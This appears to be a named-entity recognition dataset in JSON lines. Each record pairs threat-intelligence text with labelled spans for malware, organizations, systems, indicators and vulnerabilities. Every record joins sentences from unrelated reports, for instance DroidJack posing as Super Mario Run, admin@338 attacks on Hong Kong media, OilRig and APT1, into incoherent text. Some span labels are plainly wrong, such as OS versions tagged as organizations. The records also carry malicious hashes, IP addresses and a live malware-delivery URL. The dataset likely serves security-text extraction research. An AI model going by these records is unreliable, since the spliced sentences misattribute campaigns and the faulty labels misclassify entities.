{"text": "Super Mario Run Malware # 2 \u2013 DroidJack RAT Gamers love Mario and Pokemon , but so do malware authors . The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . From April 19-24 , 2017 , a politically-motivated , targeted campaign was carried out against numerous Israeli organizations . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to \u2022", "spans": [{"start": 0, "end": 23, "label": "Malware"}, {"start": 30, "end": 43, "label": "Malware"}, {"start": 56, "end": 61, "label": "System"}, {"start": 66, "end": 73, "label": "System"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 139, "end": 152, "label": "Organization"}, {"start": 165, "end": 202, "label": "Organization"}, {"start": 221, "end": 244, "label": "System"}, {"start": 253, "end": 263, "label": "System"}, {"start": 279, "end": 299, "label": "System"}, {"start": 514, "end": 523, "label": "Organization"}]}
{"text": "A few days back , we wrote about an Android Marcher trojan variant posing as the Super Mario Run game for Android . The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China . Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details . As we commonly see in the ransomware space , this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control ( C2 ) frameworks like Cobalt Strike .", "spans": [{"start": 36, "end": 43, "label": "System"}, {"start": 44, "end": 51, "label": "Malware"}, {"start": 81, "end": 96, "label": "System"}, {"start": 106, "end": 113, "label": "System"}, {"start": 120, "end": 129, "label": "Organization"}, {"start": 158, "end": 173, "label": "Organization"}, {"start": 200, "end": 233, "label": "Organization"}, {"start": 259, "end": 280, "label": "Organization"}, {"start": 550, "end": 575, "label": "System"}, {"start": 581, "end": 594, "label": "System"}]}
{"text": "We have found another instance of malware posing as the Super Mario Run Android app , and this time it has taken the form of DroidJack RAT ( remote access trojan ) . Multiple China-based cyber threat groups have targeted international media organizations in the past . Initial reports of the attacks , published April 26 ( in Hebrew ) by the Israel National Cyber Event Readiness Team ( CERT-IL ) and The Marker , confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel . Indicators can be automatically sent to your security tools , like secure email gateway and firewalls , to respond and block threats in realtime .", "spans": [{"start": 56, "end": 71, "label": "System"}, {"start": 72, "end": 79, "label": "System"}, {"start": 125, "end": 138, "label": "Malware"}, {"start": 187, "end": 206, "label": "Organization"}, {"start": 221, "end": 254, "label": "Organization"}, {"start": 342, "end": 384, "label": "Organization"}, {"start": 387, "end": 394, "label": "Organization"}, {"start": 405, "end": 411, "label": "Organization"}, {"start": 472, "end": 477, "label": "System"}, {"start": 490, "end": 511, "label": "Organization"}, {"start": 557, "end": 567, "label": "Indicator"}, {"start": 602, "end": 616, "label": "System"}, {"start": 624, "end": 644, "label": "System"}, {"start": 649, "end": 658, "label": "System"}]}
{"text": "Proofpoint wrote about the DroidJack RAT side-loaded with the Pokemon GO app back in July 2016 ; the difference here is that there is no game included in the malicious package . The admin@338 has targeted international media organizations in the past . Ironically , Ben-Gurion University is home to Israel \u2019s Cyber Security Research Center . So , if you get a bunch of messages from strangers , do n't click on the links , and do n\u2019t click on any attachments .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 27, "end": 40, "label": "Malware"}, {"start": 62, "end": 72, "label": "System"}, {"start": 182, "end": 191, "label": "Organization"}, {"start": 205, "end": 238, "label": "Organization"}, {"start": 266, "end": 287, "label": "Organization"}, {"start": 299, "end": 339, "label": "Organization"}, {"start": 354, "end": 392, "label": "Indicator"}]}
{"text": "The authors are trying to latch onto the popularity of the Super Mario Run game to target eagerly waiting Android users . In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . Investigators put the origin of the attack as Iranian ; Morphisec \u2019s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns . This sample works in tandem with PIEHOP , which sets up the execution .", "spans": [{"start": 59, "end": 74, "label": "System"}, {"start": 106, "end": 113, "label": "System"}, {"start": 143, "end": 152, "label": "Organization"}, {"start": 211, "end": 230, "label": "Organization"}, {"start": 337, "end": 346, "label": "Organization"}, {"start": 465, "end": 471, "label": "Malware"}]}
{"text": "Details : Name : Super Mario Run Package Name : net.droidjack.server MD5 : 69b4b32e4636f1981841cbbe3b927560 Technical Analysis : The malicious package claims to be the Super Mario Run game , as shown in the permissions screenshot below , but in reality this is a malicious RAT called DroidJack ( also known as SandroRAT ) that is getting installed . In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . The fileless attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word , CVE-2017-0199 , to install a fileless attack variant of the Helminth Trojan agent . For more information , contact : intelreports@kaspersky.comPowerShell event logs for the creation of an arbitrary process from PowerShell .", "spans": [{"start": 17, "end": 32, "label": "System"}, {"start": 48, "end": 68, "label": "Indicator"}, {"start": 75, "end": 107, "label": "Indicator"}, {"start": 168, "end": 183, "label": "System"}, {"start": 284, "end": 293, "label": "Malware"}, {"start": 310, "end": 319, "label": "Malware"}, {"start": 371, "end": 384, "label": "Organization"}, {"start": 443, "end": 462, "label": "Organization"}, {"start": 517, "end": 532, "label": "Organization"}, {"start": 551, "end": 565, "label": "System"}, {"start": 600, "end": 608, "label": "Vulnerability"}, {"start": 626, "end": 630, "label": "System"}, {"start": 633, "end": 646, "label": "Vulnerability"}, {"start": 693, "end": 701, "label": "Malware"}, {"start": 702, "end": 708, "label": "Malware"}, {"start": 844, "end": 854, "label": "System"}]}
{"text": "Once installed , the RAT registers the infected device as shown below . In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations . Microsoft released the patch for the vulnerability on April 11 , but many organizations have not yet deployed the update . Our initial investigation on the domains registered by Hack520 revealed that similar domains ( listed below ) were registered by another profile .", "spans": [{"start": 93, "end": 102, "label": "Organization"}, {"start": 161, "end": 180, "label": "Organization"}, {"start": 183, "end": 192, "label": "Organization"}, {"start": 361, "end": 368, "label": "Organization"}]}
{"text": "DroidJack RAT starts capturing sensitive information like call data , SMS data , videos , photos , etc . The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . The attackers actually based their attack on an existing Proof-of-Concept method that was published by researchers after the patch release . In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 109, "end": 118, "label": "Organization"}, {"start": 147, "end": 181, "label": "Organization"}, {"start": 270, "end": 279, "label": "Organization"}]}
{"text": "Observe below the code routine for call recording . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer . By hunting through known malware repositories , Morphisec identified matching samples uploaded by Israeli high-tech development companies , medical organizations and education organizations , indicating that they were victims of the attack . The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": [{"start": 61, "end": 76, "label": "System"}, {"start": 117, "end": 126, "label": "Organization"}, {"start": 153, "end": 163, "label": "Malware"}, {"start": 281, "end": 290, "label": "Organization"}, {"start": 373, "end": 394, "label": "Organization"}, {"start": 399, "end": 422, "label": "Organization"}, {"start": 507, "end": 593, "label": "Vulnerability"}, {"start": 663, "end": 671, "label": "Organization"}]}
{"text": "This RAT records all the calls and stores the recording to an \u201c .amr \u201d file . We observed the admin@338 upload a second stage malware , known as BUBBLEWRAP ( also known as Backdoor.APT.FakeWinHTTPHelper ) to their Dropbox account along with the following command . For security purposes , Morphisec is not revealing these names . We have seen this algorithm deployed by other groups before , either as a standalone encryption algorithm or as part of a more custom approach .", "spans": [{"start": 64, "end": 68, "label": "Indicator"}, {"start": 94, "end": 103, "label": "Organization"}, {"start": 145, "end": 155, "label": "System"}, {"start": 172, "end": 202, "label": "System"}, {"start": 289, "end": 298, "label": "Organization"}, {"start": 343, "end": 382, "label": "Malware"}, {"start": 392, "end": 435, "label": "Malware"}, {"start": 439, "end": 472, "label": "Malware"}]}
{"text": "The following is the code routine for video capturing . We have previously observed the admin@338 group use BUBBLEWRAP . Upon deeper investigation into the installed Helminth fileless agent , we identified a near perfect match to the OilRig campaign executed by an Iranian hacker group against 140 financial institutions in the Middle East last year , as analyzed by FireEye , Palo Alto Networks and Logrhythm . In late 2022 , Mandiant responded to a disruptive cyber physical incident in which the Russia - linked threat actor Sandworm targeted a Ukrainian critical infrastructure organization .", "spans": [{"start": 88, "end": 103, "label": "Organization"}, {"start": 108, "end": 118, "label": "System"}, {"start": 166, "end": 174, "label": "Malware"}, {"start": 234, "end": 240, "label": "Malware"}, {"start": 367, "end": 374, "label": "Organization"}, {"start": 377, "end": 395, "label": "Organization"}, {"start": 400, "end": 409, "label": "Organization"}, {"start": 427, "end": 435, "label": "Organization"}, {"start": 451, "end": 485, "label": "Organization"}, {"start": 528, "end": 536, "label": "Organization"}, {"start": 548, "end": 594, "label": "Organization"}]}
{"text": "Here , the RAT stores all the captured videos in a \u201c video.3gp \u201d file . The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets . This group has become one of the most active threat actors , with noteworthy abilities , resources and infrastructure ; speculations indicate the hacking organization to be sponsored by the Iranian government . The code hunted for several security products to evade \u2013 including Kaspersky .", "spans": [{"start": 53, "end": 62, "label": "Indicator"}, {"start": 76, "end": 83, "label": "System"}, {"start": 115, "end": 120, "label": "Organization"}, {"start": 124, "end": 143, "label": "Malware"}, {"start": 178, "end": 188, "label": "System"}, {"start": 476, "end": 494, "label": "Organization"}, {"start": 564, "end": 573, "label": "System"}]}
{"text": "It also harvests call details and SMS logs as shown below . The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . In other recent attacks ( January 2017 ) , the group used a fake Juniper Networks VPN portal and fake University of Oxford websites to deliver malware as described by ClearSky . UNC2452 is a sophisticated group that has targeted government and private sector entities worldwide .", "spans": [{"start": 64, "end": 73, "label": "Organization"}, {"start": 157, "end": 168, "label": "Organization"}, {"start": 326, "end": 346, "label": "System"}, {"start": 363, "end": 383, "label": "Organization"}, {"start": 428, "end": 436, "label": "Organization"}, {"start": 439, "end": 446, "label": "Organization"}, {"start": 490, "end": 500, "label": "Organization"}, {"start": 505, "end": 538, "label": "Organization"}]}
{"text": "Upon further inspection , we have observed that this RAT extracts WhatsApp data too . An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . Name SHA256 . If more groups start adopting CL0P 's zero - day exploitation techniques , the ransomware landscape could tilt from service - oriented attacks to a more aggressive , vulnerability - focused model \u2014 a move that could skyrocket the impact of attacks .", "spans": [{"start": 66, "end": 74, "label": "System"}, {"start": 89, "end": 97, "label": "Organization"}, {"start": 181, "end": 192, "label": "Organization"}, {"start": 307, "end": 313, "label": "Organization"}, {"start": 378, "end": 388, "label": "Malware"}]}
{"text": "The RAT stores all the data in a database ( DB ) in order to send it to the Command & Control ( C & C ) server . The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . 13.doc : a9bbbf5e4797d90d579b2cf6f9d61443dff82ead9d9ffd10f3c31b686ccf81ab . We mentioned Akamai 's blog but it was also documented by Recorded Future .", "spans": [{"start": 117, "end": 122, "label": "Organization"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 167, "end": 176, "label": "Organization"}, {"start": 234, "end": 255, "label": "System"}, {"start": 264, "end": 274, "label": "System"}, {"start": 285, "end": 295, "label": "Organization"}, {"start": 300, "end": 315, "label": "Organization"}, {"start": 332, "end": 347, "label": "Organization"}, {"start": 357, "end": 363, "label": "Indicator"}, {"start": 366, "end": 430, "label": "Indicator"}, {"start": 446, "end": 455, "label": "Organization"}, {"start": 491, "end": 506, "label": "Organization"}]}
{"text": "The following are the DBs created and maintained by the RAT . The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . 558.doc , 2.doc: 2869664d456034a611b90500f0503d7d6a64abf62d9f9dd432a8659fa6659a84 . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": [{"start": 66, "end": 72, "label": "Organization"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 117, "end": 126, "label": "Organization"}, {"start": 184, "end": 205, "label": "System"}, {"start": 214, "end": 224, "label": "System"}, {"start": 235, "end": 245, "label": "Organization"}, {"start": 250, "end": 265, "label": "Organization"}, {"start": 282, "end": 297, "label": "Organization"}, {"start": 307, "end": 314, "label": "Indicator"}, {"start": 324, "end": 388, "label": "Indicator"}, {"start": 391, "end": 414, "label": "Organization"}, {"start": 522, "end": 531, "label": "Vulnerability"}]}
{"text": "We saw the following hardcoded C & C server location in the RAT package : Conclusion : The DroidJack RAT is another example of a growing trend in which malware authors seek to exploit public interest as a way to spread malware . The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 1.doc : 832cc791aad6462687e42e40fd9b261f3d2fbe91c5256241264309a5d437e4d8 . Mandiant is not aware of any configuration change that can be made to force request logging for these endpoints .", "spans": [{"start": 91, "end": 104, "label": "Malware"}, {"start": 233, "end": 242, "label": "Organization"}, {"start": 310, "end": 328, "label": "Organization"}, {"start": 331, "end": 339, "label": "Organization"}, {"start": 342, "end": 352, "label": "Organization"}, {"start": 359, "end": 374, "label": "Organization"}, {"start": 377, "end": 382, "label": "Indicator"}, {"start": 385, "end": 449, "label": "Indicator"}, {"start": 452, "end": 460, "label": "Organization"}]}
{"text": "In this case , like others before , the event of a popular game release became an opportunity to trick unsuspecting users into downloading the RAT . The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 3.doc : d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48 . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked \u201c exploitation more likely . \u201d", "spans": [{"start": 153, "end": 162, "label": "Organization"}, {"start": 209, "end": 222, "label": "Organization"}, {"start": 230, "end": 248, "label": "Organization"}, {"start": 251, "end": 259, "label": "Organization"}, {"start": 262, "end": 272, "label": "Organization"}, {"start": 279, "end": 294, "label": "Organization"}, {"start": 297, "end": 302, "label": "Indicator"}, {"start": 305, "end": 369, "label": "Indicator"}, {"start": 385, "end": 401, "label": "Vulnerability"}, {"start": 476, "end": 492, "label": "Vulnerability"}]}
{"text": "As a reminder , it is always a good practice to download apps only from trusted app stores such as Google Play . In August 2013 , FireEye reported that admin@338 had been using the Poison Ivy RAT in its operations . The most notable difference from last year \u2019s OilRig campaign is the way the attack was delivered . During the investigation , Mandiant observed the threat actor target four ( 4 ) OSX Ventura systems running either versions 13.3 or 13.4.1 .", "spans": [{"start": 99, "end": 110, "label": "System"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 152, "end": 161, "label": "Organization"}, {"start": 181, "end": 195, "label": "System"}, {"start": 262, "end": 268, "label": "Malware"}, {"start": 396, "end": 415, "label": "Organization"}, {"start": 431, "end": 454, "label": "Organization"}]}
{"text": "This practice can be enforced by unchecking the \" Unknown Sources '' option under the \" Security '' settings of your device . In March 2014 , the admin@338 leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank . In the previous campaign , the Iranian group sent specially crafted Excel and Word files , which contained macros that targeted individuals were convinced to enable . However , over time , it becomes tedious for fraudsters to constantly change information when registering new domains .", "spans": [{"start": 146, "end": 155, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 283, "end": 293, "label": "Organization"}, {"start": 364, "end": 369, "label": "System"}, {"start": 374, "end": 378, "label": "System"}, {"start": 508, "end": 518, "label": "Organization"}]}
{"text": "XLoader Disguises as Android Apps , Has FakeSpy Links This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices . In March 2014 , the group leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank . Name Delivery Server . COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts , which are rarely discovered or disclosed .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 21, "end": 28, "label": "System"}, {"start": 40, "end": 47, "label": "Malware"}, {"start": 63, "end": 70, "label": "Malware"}, {"start": 107, "end": 114, "label": "System"}, {"start": 146, "end": 149, "label": "System"}, {"start": 168, "end": 174, "label": "System"}, {"start": 179, "end": 183, "label": "System"}, {"start": 214, "end": 219, "label": "Organization"}, {"start": 294, "end": 304, "label": "Organization"}, {"start": 347, "end": 357, "label": "Organization"}, {"start": 383, "end": 395, "label": "Malware"}, {"start": 421, "end": 443, "label": "Malware"}]}
{"text": "By : Hara Hiroaki , Lilang Wu , Lorin Wu April 02 , 2019 In previous attacks , XLoader posed as Facebook , Chrome and other legitimate applications to trick users into downloading its malicious app . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . test4.hta http://comonscar.in ( 82.145.40.46 ) . PIEHOP expects its main function to be called via another Python file , supplying either the argument or .", "spans": [{"start": 79, "end": 86, "label": "Malware"}, {"start": 96, "end": 104, "label": "System"}, {"start": 107, "end": 113, "label": "System"}, {"start": 213, "end": 220, "label": "Organization"}, {"start": 227, "end": 236, "label": "Organization"}, {"start": 304, "end": 336, "label": "Vulnerability"}, {"start": 387, "end": 394, "label": "System"}, {"start": 397, "end": 406, "label": "Indicator"}, {"start": 407, "end": 426, "label": "Indicator"}, {"start": 429, "end": 441, "label": "Indicator"}, {"start": 446, "end": 452, "label": "System"}]}
{"text": "Trend Micro researchers found a new variant that uses a different way to lure users . According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . test5.hta 80.82.67.42 . Would you click on the links in the email , even if it came from an address you did nt recognize If you have old vacation pictures on Facebook , a determined hacker could use them to write such an email , and cyber criminals are starting to use that kind of information to craft targets specifically for their victims .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 99, "end": 106, "label": "Organization"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 190, "end": 222, "label": "Vulnerability"}, {"start": 273, "end": 280, "label": "System"}, {"start": 283, "end": 292, "label": "Indicator"}, {"start": 293, "end": 304, "label": "Indicator"}, {"start": 516, "end": 531, "label": "Organization"}]}
{"text": "This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices . The admin@338 's Dropbox accounts have also been found to contain a different backdoor dubbed BUBBLEWRAP . test1.hta reserved . By selecting these links , you will be leaving NIST webspace .", "spans": [{"start": 9, "end": 16, "label": "Malware"}, {"start": 53, "end": 60, "label": "System"}, {"start": 92, "end": 95, "label": "System"}, {"start": 114, "end": 120, "label": "System"}, {"start": 125, "end": 129, "label": "System"}, {"start": 144, "end": 153, "label": "Organization"}, {"start": 234, "end": 244, "label": "System"}, {"start": 247, "end": 256, "label": "Indicator"}, {"start": 315, "end": 319, "label": "Organization"}]}
{"text": "Aside from a change in its deployment techniques , a few changes in its code set it apart from its previous versions . Researchers have pointed out that it is not uncommon for China-based threat groups to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement . SHA256: 5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43 . The IP range for \u201c PIG GOD \u201d is 43[.]255[.]188.0/22 , which appears to be hosted in Hong Kong as seen in the information we found : The domain 66[.]to leads to another website that shows Hack520 \u2019s pet pig .", "spans": [{"start": 188, "end": 201, "label": "Organization"}, {"start": 222, "end": 241, "label": "Organization"}, {"start": 326, "end": 390, "label": "Indicator"}, {"start": 393, "end": 444, "label": "Indicator"}, {"start": 536, "end": 543, "label": "Indicator"}]}
{"text": "This newest variant has been labeled XLoader version 6.0 ( detected as AndroidOS_XLoader.HRXD ) , following the last version discussed in a previous research on the malware family . Researchers have pointed out that it is not uncommon for admin@338 to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement . Name SHA256 . \" The server was used to distribute and infect victims with an upgraded version of Rising Sun with SSL capabilities , \" informs a report shared with BleepingComputer .", "spans": [{"start": 37, "end": 44, "label": "Malware"}, {"start": 71, "end": 93, "label": "Indicator"}, {"start": 239, "end": 248, "label": "Organization"}, {"start": 269, "end": 288, "label": "Organization"}, {"start": 528, "end": 544, "label": "System"}]}
{"text": "Infection chain The threat actors behind this version used several fake websites as their host \u2014 copying that of a Japanese mobile phone operator \u2019 s website in particular \u2014 to trick users into downloading the fake security Android application package ( APK ) . This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose . 0011.ps1 042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1 . If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": [{"start": 224, "end": 231, "label": "System"}, {"start": 287, "end": 294, "label": "Organization"}, {"start": 313, "end": 318, "label": "Organization"}, {"start": 336, "end": 343, "label": "Organization"}, {"start": 351, "end": 360, "label": "Organization"}, {"start": 420, "end": 429, "label": "Organization"}, {"start": 439, "end": 459, "label": "Organization"}, {"start": 495, "end": 510, "label": "Organization"}, {"start": 521, "end": 529, "label": "Indicator"}, {"start": 530, "end": 594, "label": "Indicator"}]}
{"text": "Monitoring efforts on this new variant revealed that the malicious websites are spread through smishing . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials . 1.vbs BE7F1D411CC4160BB221C7181DA4370972B6C867AF110C12850CAD77981976ED . None Organizations should apply the November 8 , 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method .", "spans": [{"start": 110, "end": 119, "label": "Organization"}, {"start": 137, "end": 151, "label": "System"}, {"start": 156, "end": 177, "label": "System"}, {"start": 209, "end": 229, "label": "Organization"}, {"start": 232, "end": 237, "label": "Indicator"}, {"start": 238, "end": 302, "label": "Indicator"}, {"start": 442, "end": 455, "label": "Vulnerability"}]}
{"text": "The infection has not spread very widely at the time of writing , but we \u2019 ve seen that many users have already received its SMS content . The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials . A Glimpse into Glimpse For the second blog post in our series, the IronNet Threat Research Team examines the Glimpse malware that is written in PowerShell and has been associated with OilRig S-APT/APT34 . Instead , it \u2019s likely that Royal is simply testing a new encryptor \u2014 especially considering that BlackSuit was used in just two attacks last month \u2014 and that this lull can be explained as more or less of a research period for them .", "spans": [{"start": 143, "end": 152, "label": "Organization"}, {"start": 170, "end": 184, "label": "System"}, {"start": 189, "end": 210, "label": "System"}, {"start": 242, "end": 262, "label": "Organization"}, {"start": 280, "end": 287, "label": "Organization"}, {"start": 332, "end": 360, "label": "Organization"}, {"start": 374, "end": 381, "label": "Malware"}, {"start": 409, "end": 419, "label": "System"}, {"start": 449, "end": 467, "label": "Organization"}, {"start": 498, "end": 503, "label": "Malware"}, {"start": 524, "end": 537, "label": "System"}, {"start": 568, "end": 577, "label": "Malware"}]}
{"text": "In the past , XLoader showed the ability to mine cryptocurrency on PCs and perform account phishing on iOS devices . FireEye analysts documented the admin@338 group 's activities in a previous paper titled Poison Ivy : Assessing Damage and Extracting Intelligence paper . Our first post about analyzing malware with DNS tunneling capabilities focuses on how the PoisonFrog malware uses DNS tunneling to send and receive victim information and commands . If this is a potential threat vector for the organization , dual controls need to be put in place .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 103, "end": 106, "label": "System"}, {"start": 117, "end": 124, "label": "Organization"}, {"start": 149, "end": 164, "label": "Organization"}, {"start": 206, "end": 216, "label": "System"}, {"start": 316, "end": 319, "label": "Indicator"}, {"start": 362, "end": 372, "label": "Malware"}]}
{"text": "This new wave also presents unique attack vectors based on the kind of device it has accessed . The spear-phishing campaign against Asian entities isn't isolated , the admin@338 also started another attack against the US-based think tank on 14th March . Glimpse : 6e86c57385d26a59c0df1580454b9967 . In terms of the fallout , it \u2019s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": [{"start": 168, "end": 177, "label": "Organization"}, {"start": 227, "end": 237, "label": "Organization"}, {"start": 254, "end": 261, "label": "Malware"}, {"start": 264, "end": 296, "label": "Indicator"}, {"start": 360, "end": 364, "label": "Organization"}, {"start": 397, "end": 407, "label": "Vulnerability"}]}
{"text": "In the case of Android devices , accessing the malicious website or pressing any of the buttons will prompt the download of the APK . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China 's cyber threat actors . Glimpse is a PowerShell script that is executed silently by Visual Basic . The victims in this campaign a government in Asia and a telecommunications company in the Middle East do align with the kinds of victims we often see Budworm targeting .", "spans": [{"start": 15, "end": 22, "label": "System"}, {"start": 175, "end": 179, "label": "Organization"}, {"start": 254, "end": 273, "label": "Organization"}, {"start": 276, "end": 283, "label": "Malware"}, {"start": 289, "end": 299, "label": "System"}, {"start": 336, "end": 348, "label": "System"}, {"start": 371, "end": 379, "label": "Organization"}, {"start": 380, "end": 400, "label": "Organization"}, {"start": 405, "end": 452, "label": "Organization"}, {"start": 501, "end": 508, "label": "Organization"}]}
{"text": "However , successfully installing this malicious APK requires that the user has allowed the installation of such apps as controlled in the Unknown Sources settings . FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic and trade policy . Based on the code, it is unclear what initiates the Visual Basic script . On April 21 , 2022 , KillNet also stated that \" REVIL is back in the ranks . \"", "spans": [{"start": 166, "end": 173, "label": "Organization"}, {"start": 194, "end": 203, "label": "Organization"}, {"start": 235, "end": 240, "label": "Organization"}, {"start": 262, "end": 275, "label": "Organization"}, {"start": 288, "end": 325, "label": "Organization"}, {"start": 380, "end": 392, "label": "System"}, {"start": 423, "end": 430, "label": "Organization"}]}
{"text": "If users allow such apps to be installed , then it can be actively installed on the victim \u2019 s device . The simplest conclusion based on these facts is that APT1 is operating in China , and most likely in Shanghai . However, a variety of typical persistence mechanisms, such as a scheduled task, could serve that . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": [{"start": 157, "end": 161, "label": "Organization"}, {"start": 315, "end": 338, "label": "Organization"}, {"start": 446, "end": 455, "label": "Vulnerability"}]}
{"text": "The infection chain is slightly more roundabout in the case of Apple devices . These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are . After Glimpse starts, it checks for the existence of a directory and lock . Ego", "spans": [{"start": 63, "end": 68, "label": "System"}, {"start": 105, "end": 109, "label": "Organization"}, {"start": 184, "end": 188, "label": "Organization"}, {"start": 265, "end": 272, "label": "Malware"}]}
{"text": "Accessing the same malicious site would redirect its user to another malicious website ( hxxp : //apple-icloud [ . APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it presently . If no directory or lock file is found, Glimpse creates . While a top attack vector for Cuba is the exploitation of known vulnerabilities , the actors techniques also include phishing campaigns , compromised credentials , and remote desktop protocol exploits .", "spans": [{"start": 89, "end": 114, "label": "Indicator"}, {"start": 115, "end": 119, "label": "Organization"}, {"start": 151, "end": 158, "label": "System"}, {"start": 257, "end": 264, "label": "Malware"}]}
{"text": "] qwq-japan [ . While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT . Alternatively, if these do exist and the lock file is older than 10 minutes, the lock file is deleted and the previously running Glimpse script is . The script contained instructions to download and execute a second stage payload .", "spans": [{"start": 22, "end": 26, "label": "Organization"}, {"start": 54, "end": 82, "label": "System"}, {"start": 91, "end": 101, "label": "System"}, {"start": 106, "end": 115, "label": "System"}, {"start": 247, "end": 254, "label": "Malware"}, {"start": 267, "end": 347, "label": "Malware"}]}
{"text": "] com or hxxp : //apple-icloud [ . Given the mission , resourcing , and location of PLA Unit 61398 , we conclude that PLA Unit 61398 is APT1 . After the initial checks described above, Glimpse creates a hidden file that contains an agent ID, which is a simple concatenation of a random number 10-99 and the first 8 characters of a GUID without . Apropos of my retrospective report , Bullock found that a great many messages in Biderman \u2019s inbox were belligerent and anti - Semitic screeds from a former Ashley Madison employee named William Brewster Harrison .", "spans": [{"start": 9, "end": 34, "label": "Indicator"}, {"start": 84, "end": 98, "label": "Organization"}, {"start": 118, "end": 132, "label": "Organization"}, {"start": 136, "end": 140, "label": "Organization"}, {"start": 185, "end": 192, "label": "Malware"}, {"start": 331, "end": 335, "label": "System"}, {"start": 383, "end": 390, "label": "Organization"}, {"start": 503, "end": 526, "label": "Organization"}, {"start": 533, "end": 558, "label": "Organization"}]}
{"text": "] zqo-japan [ . APT1 were a highly prolific cyber-attack group operating out of China . The methods employed by Glimpse to perform DNS communications are determined by the mode in which it is operating (i.e., text mode or ping ) . Although this wave did not use any zero day exploits , it relied on steganography and NTFS alternate data streams to complicate detection .", "spans": [{"start": 16, "end": 20, "label": "Organization"}, {"start": 44, "end": 62, "label": "Organization"}, {"start": 112, "end": 119, "label": "Malware"}, {"start": 131, "end": 134, "label": "Indicator"}]}
